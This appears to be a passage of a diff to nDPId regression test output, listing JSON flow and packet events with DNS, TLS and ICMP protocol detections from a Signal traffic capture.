-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264078,"flow_last_seen":1569051264078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264078,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABiAABAAEAG01TAqAIREfiSkN6kAbu8mMGjrFDpOoAYBADERQAAAQEICihVb2TeKRePFwMDACkAAAAAAAAAByneD5KHf7LhXiN5Pdq3wP31zhE4MGciEgckOq75+f9F5w=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABTAABAAEAG02PAqAIREfiSkN6kAbu8mMHRrFDpOoAYBABt7AAAAQEICihVb2XeKRePFQMDABoAAAAAAAAACJW1v\/IhTp91V+O68DpoE88kag=="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569051255515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG04LAqAIREfiSkN6kAbu8mMHwrFDpOoARBACJkgAAAQEICihVb2XeKReP"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7560000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569051257169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAABLAABAAEAGjWvAqAIRAhLodt65Absqy4Q4WMZypYAYBABE5AAAAQEICihVdq6vX9qZFQMDABKEOlUEciue5QZs7g3+sWQHUk8="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569051257169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGjYLAqAIRAhLodt65Absqy4RPWMZypYARBABBggAAAQEICihVdq6vX9qZ"} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1569051257192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257192,"pkt":"xGGLNYKpxiwDYGpkCABFAABL884AADUG5JwCEuh2wKgCEQG73rlYxnKlKsuET4AYAQIBNAAAAQEICq9gUAcoVXauFQMDABK6ebhIWf6gqCdSaZoYDdKf06A="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264073,"flow_last_seen":1569051264073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1569051264073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264073,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKMBLAbsF0WXIAAAAALAC\/\/9prAAAAgQFtAEDAwYBAQgKKFWN0AAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264078,"flow_last_seen":1569051264078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264078,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569051264088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051264088,"pkt":"xiwDYGpkxGGLNYKpCABFAABTylIAAP8Ra+TAqAIRwKgCAdvHADUAPyTGAMEBAAABAAAAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAQ=="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569051264091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264091,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7AAbuO10RdAAAAALAC\/\/\/fDwAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264093,"flow_last_seen":1569051264093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264093,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569051264091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264091,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7AAbuO10RdAAAAALAC\/\/\/fDwAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264093,"flow_last_seen":1569051264093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264093,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAACz4rsAAEAREhzAqAIBwKgCEQA128cAn9JUAMGBgAABAAYAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAcAMAAEAAQAAAB0ABDavL27ADAABAAEAAAAdAAQi4fCtwAwAAQABAAAAHQAEaxdHWcAMAAEAAQAAAB0ABCOpAyjADAABAAEAAAAdAAQ0zyk7wAwAAQABAAAAHQAENMjD8Q=="} 
00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569051264115,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569051264115,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4YPoAAEABlGjAqAIRwKgCAQMDIGEAAAAARQAAs+K7AABAERIcwKgCAcCoAhEANdvHAJ8AAA=="} 
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} 
-00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 